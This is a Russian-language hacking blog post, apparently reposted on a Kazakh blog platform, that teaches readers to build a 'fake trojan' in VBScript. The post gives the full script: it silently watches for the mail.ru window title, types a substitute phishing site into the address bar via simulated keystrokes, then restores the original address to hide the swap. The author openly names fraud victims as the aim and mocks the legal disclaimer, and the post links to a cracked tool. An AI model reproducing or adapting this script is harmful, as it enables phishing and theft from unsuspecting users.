• 7088
  • 0
  • 1
Нравится блог?
Подписывайтесь!

ФЕйк троян v 2.0 своими руками

Hi all! С вами kazin8 из -=Unlock Team-=, и после некоторого простоя раздела Статьи на нашем www.untm.tk я решил кое что написать) 

Сегодня мы напишем фейк – троян, который будет подменять любую страницу (по нашему желанию)) на любую другую (опять же хозяин – барин)). Писать будем на vbs и как пример будет нами столь любимый www.mail.ru) Для чего это надо? Это будет прекрасным фундаментом для ваших фейков. Может какого нибудь продвинутого банкира вы своим фейком на webmoney и не обманите, а вот бухгалтеры попадутся в легкую))) Начнем, пожалуй. 

1. Инструменты 
Как вы наверное знаете, vbs - это язык сценариев Windows и для него ничего кроме блокнота и прямых рук не нужно. Но мы, я надеюсь, не извращенцы, и будем использовать инструмент под названием primalscript. Посмотрите здесь http://www.crackz.su/patches/419-23-primalscript-2007-enterprise-v4-5-559.html, но если что – у вас всегда есть гугл) Так же нам понадобится немного знать vbs. Сразу говорю статья будет не из коротких. Ленивые могут взять сорс в конце, но хорошо работать он у вас не будет!!! Хоть сначала материал и покажется сложным, статья сугубо для новичков, ибо я сам тот еще новайс) 

2. Алгоритм 
Сам алгоритм будет немного непонятен на словах. Следим за моими словами. Первым делом наш скрипт отслеживает, не зашел ли человек на www.mail.ru? Это делается посредством отлавливания заголовка (он же title). Следующий шаг – передача адресной строке нужного нам адреса, передача клавиши enter, и , наконец, передача строке адреса первоначальной страницы, но уже без перехода на нее. Это для снятия палева. Сразу говорю, фейк далек от идеала, но вы можете добиваться все лучшей и лучшей его настройки. Потом скажу как. 

3. VBS 
Ну что, кто читал мою статью о wsh, тот должен понять почти все, что я буду делать. Но объяснять я все же, буду подробно. Начнем конечно с объявления разных переменных , нужных нам…. 

Option Explicit ‘ Это говорит о разделе переменных. Не дает использовать «левые» переменные 
On Error Resume Next ‘ Пропуск ошибок. Зачем скрытому фейку видимая реакция на ошибки:? 
Dim fso, userdir, wshshell,yes ‘ Объявление нужных переменных 
Set wshshell = WScript.CreateObject("WScript.Shell") ‘ создаем объект для работы с окружением винды, ему мы и будем передавать клавиши 
Set fso = WScript.CreateObject ("Scripting.FileSystemObject") ‘ Объект для работы с файловой системой. 
userdir = WSHShell.ExpandEnvironmentStrings("%userprofile%")’Получаем в userdir адрес текущего юзера винды. 
Opera = userdir+"Application DataOpera" ‘ Получаем путь к директории оперы в Application Data 
FireFox = userdir +"Application DataMozillaFirefox" ‘Получаем путь к директории Огнелиса в Application Data 
yes = 0 ‘ некая логическая переменная) 

Ну а теперь нормальные пояснения. Получение директорий оперы и огнелиса нам нужны для того, чтобы хотя бы приблизительно сказать, каким браузером пользуется жертва. Почему мы определяем не в Program Files? Да потому что каждая версия имеет свое имя папки там) Идем дальше. Что собственно за yes? Эта переменная будет служить нам для определения, есть ли на компе firefox или опера, или они сразу вместе? Или их вообще нет? Так же она поможет сократить конструкцию самого главного алгоритма. Пора переходить к следующему куску кода, который ,собственно, и объяснит переменную yes) 

If FSO.FolderExists(Opera) Or FSO.FolderExists(firefox) Then ‘Если есть опера или лис то 
yes = 1 
Else If FSO.FolderExists(Opera) And FSO.FolderExists(firefox) Then ‘ Если есть и то и другое то 
yes = 2 
End If 
End If 

Поясняю) FSO.FolderExists(DirName) возвращает true когда директория существует и false когда ее нет. Or – оператор или. То есть, если существует только одна директория – оперы или огнелиса, то yes = 1. А если существуют обе директории, то yes = 2. А если их вообще нет, yes так и останется 0. Теперь самый большой кусок. И последний. 

do while 1=1 ‘Цикл пока 1=1 делать…. То есть бесконечно) 
If yes = 1 Or 2 then ‘ Если yes <> 0 можно заменить if yes>0 then 
If WshShell.AppActivate (“@MAIL.RU: почта, новости, работа, рассылки, развлечения. Почта @MAIL.RU - бесплатная почта #1") Then ‘ Если активно окно с mail.ru то 
wshshell.SendKeys "^L" ‘ Горячая клавиша перехода на адресную строку. Ctrl+L 
wshshell.SendKeys "цццюрфлукыгззщкеюкг" ‘Передаем строке www.hakersupport.ru русскими буквами 
wshshell.SendKeys "~" ‘ Символ соответствует нажатию enter 
WScript.Sleep 2000 ‘ Ждем 2 секунды 
wshshell.SendKeys "^L" ‘ На всякий случай опять активизируем адресную строку 
wshshell.SendKeys "цццюьфшдюкг" ‘пишем в ней www.mail.ru русскими буквами 
WScript.Sleep 1000 ‘ Отдыхаем 1 сек. 
wshshell.SendKeys "{ESC}" ‘ Сбрасываем выделение 
End If 
Else ‘ Если yes = 0, то есть в системе только ie (ну или chrome. Его я не стал учитывать) 
If WshShell.AppActivate (“@MAIL.RU: почта, новости, работа, рассылки, развлечения. Почта @MAIL.RU - бесплатная почта #1") Then 
wshshell.SendKeys "^L" 
wshshell.SendKeys " цццюрфлукыгззщкеюкг " 
wshshell.SendKeys "~" 
WScript.Sleep 2000 
wshshell.SendKeys " цццюьфшдюкг " 
WScript.Sleep 1000 
wshshell.SendKeys "{ESC}" 
End If 
End If 
loop 

Мда…. Написано много, а понять не очень получается. Буду разъяснять. Начнем с того момента, когда проверка yes > 0 дает положительный результат, то есть пользуются скорее всего не ie. If WshShell.AppActivate вот эта волшебная функция следит, когда в «строке заголовка программы» появится заданный ей параметр. Но ведь строка заголовка в браузере равна title страницы, заруженной в нем!_) Воспользуемся этим. Title mail.ru всем известен. Идем дальше. Когда мы получили титл, то есть человек загрузил mail мы посылаем браузеру сочетания клавиш Ctrl + L (горячие клавиши для выделения адресной строки)) . Так строку выделили. Теперь надо бы послать нужный нам адрес…. Но… Ведь если человек написал www.mail.ru значит его раскладка стоит на русском. Поэтому русские буквы будут писаться на англ) пользуемся) Написали… Теперь шлем Enter) (символ ~). Теперь подождем пока браузер загрузит подставную страницу…. Теперь на всякий случай повторим выделение строки и напишем там www.mail.ru, опять же русскими буквами…. Так. Теперь хорошо бы снять выделение. Посылаем нажатие клавиши Escape. Вот и все. 
Для ie тоже, но без повторного выделения, ибо ИА не выделяет строку а открывает новое окно для ввода. 

4. Лирическое отступление…. 
Как ты смог заметить…. Фейк далек от идеала… Но все в твоих силах. Сейчас я честно перечислю его проблемы. Во-первых, проблема в том, что ИА самый ублюдский браузер (Извини билли). Он на столько медленный, что когда у мя падает интернет, то я даже этого не замечаю, на столько долго грузит ИА. Если честно, на нем я заразу не тестировал… Ибо у меня его нет))) Прошу всех кто может, попробовать добиться идеального соотношения времени. Во-вторых, в опере есть баг, по крайне мере в 9. Сколько бы раз я ей не передавал Escape, она не хочет снимать выделение. Ну баг не самый страшный. А вот firefox показал себя просто как Медведев в разговоре с Саакашвили) Быстро, четко…. Я рад за огнелиса) 
Ну и наконец, главная просьба. Понимаете, у людей разные скорости подключения и время может быть разным. Прошу вас тестить этот фейк у себя, менять значения Sleep на большие или меньшие, и когда вы добьетесь лучшего результата, пожалуйста напишите в комментах скорость подключения и величину Sleep)))) 
Спасибо всем, кто все же прочитал это бред. С вами был kazin8 -=Unlock Team=- 
Великих вам взломов и удачи! (Помните, 243 статья уголовного кодекса карает создание и распространение вредоносных программ. Статья написана лишь для ознакомления… БЛА БЛА БЛА))). 

Сорс - http://unlock-team.ucoz.ru/load/9-1-0-43

 

Как стать хакером

   
huzrus
3 февраля 2013, 21:45
531

Загрузка...

Комментарии

Оставьте свой комментарий

Спасибо за открытие блога в Yvision.kz! Чтобы убедиться в отсутствии спама, все комментарии новых пользователей проходят премодерацию. Соблюдение правил нашей блог-платформы ускорит ваш переход в категорию надежных пользователей, не нуждающихся в премодерации. Обязательно прочтите наши правила по указанной ссылке: Правила

Также можно нажать Ctrl+Enter

Популярные посты

Я был удивлён, что в Азербайджане есть Казахский район

Я был удивлён, что в Азербайджане есть Казахский район

Мне как казаху по национальности очень хотелось туда попасть. Оказалось, что климат там намного суровей и люди, говорят, суровые и воинственные. Казах – город на западе Азербайджана...
alidimash
18 янв. 2017 / 21:50
  • 25985
  • 18
10 лучших районов Алматы. Широкие улочки, частные дома, летом – красота!

10 лучших районов Алматы. Широкие улочки, частные дома, летом – красота!

Названия улиц: Садовый бульвар, Солнечный проезд. Красиво звучит не так ли? Прям, как в Москве... Уютные улочки и радующие глаз одноэтажные домики, тихо и свободно, нет динамики, движух и ажиотажа.
gelberdeuet
16 янв. 2017 / 14:45
  • 8025
  • 98
Айсулу Салгарина. Решил пойти в гости к той, что вызывает гордость за казахских девушек

Айсулу Салгарина. Решил пойти в гости к той, что вызывает гордость за казахских девушек

Прошло около 2 лет. За эти годы в моей жизни многое изменилось. И мне стало интересно, какие же изменения произошли в жизни тех, у кого я когда-то брал интервью...
DastanIskakov
14 янв. 2017 / 11:43
  • 5335
  • 7
Многочасовые очереди, смерти в ЦОНах: почему вопросы об этом ставят парламентариев в тупик?

Многочасовые очереди, смерти в ЦОНах: почему вопросы об этом ставят парламентариев в тупик?

Ожидали ли депутаты Мажилиса всего этого? Как планировали этот процесс регистрации, и обсуждали ли его, прежде чем одним нажатием кнопки принять нормы с такими абсурдными временными рамками?
openqazaqstan
17 янв. 2017 / 14:32
  • 4837
  • 22
Сильное ДТП произошло в Алматы на Тимирязева-Байзакова

Сильное ДТП произошло в Алматы на Тимирязева-Байзакова

NoComment (c) Официальный слоган EuroNews. Катастрофа на алматинской утренней трассе началась с того, что водители «Ниссана» и микровена ожидали сигнала светофора на запад по Тимирязева...
ibestreporter
17 янв. 2017 / 22:52
  • 3690
  • 5
Вейпинг безопасен? Эндрю Холл из США тоже так считал, пока что-то не пошло не так

Вейпинг безопасен? Эндрю Холл из США тоже так считал, пока что-то не пошло не так

Эндрю Холл из США считал, что вейпинг безопасен и усиленно убеждал в этом близких. Но как-то раз что-то пошло не так. Это результат взрыва хипстерского устройства - выбило 7 зубов + ожоги и раны...
Maxambet
17 янв. 2017 / 16:28
  • 3555
  • 47
Астана глазами алматинских девушек. Как при таких погодных условиях можно выжить?

Астана глазами алматинских девушек. Как при таких погодных условиях можно выжить?

В спальных районах, и в высотных домах сквозь стены слышно завывание ветра. В особенности ночью. Такие звуки, я слышала, пожалуй, только по телевизору, в фильмах про метель.
Naomi_K
вчера / 12:36
Это поколение просрет страну. 20-летняя молодежь представляет из себя сказочных эльфов

Это поколение просрет страну. 20-летняя молодежь представляет из себя сказочных эльфов

Смотря в очередные пустые глаза вчерашнего студента, приходящего устраиваться на первую работу страшно становится. Потому что сравниваю с теми же китайскими студентами, которые готовы выгрызать себе мечту.
mbaitykov
18 янв. 2017 / 11:34
  • 3617
  • 98
Становится хуже, но как-то постепенно. Беднеем, но тоже как-то не разом

Становится хуже, но как-то постепенно. Беднеем, но тоже как-то не разом

Помню, когда я уезжал и Казахстана, тут было довольно прилично, даже не смотря на то, что жить было невыносимо. Но прилично так. Мусора было меньше. Дороги чистили, вони почти не было. Да и в остальном тоже норм.
shootnix
18 янв. 2017 / 12:49
  • 3119
  • 34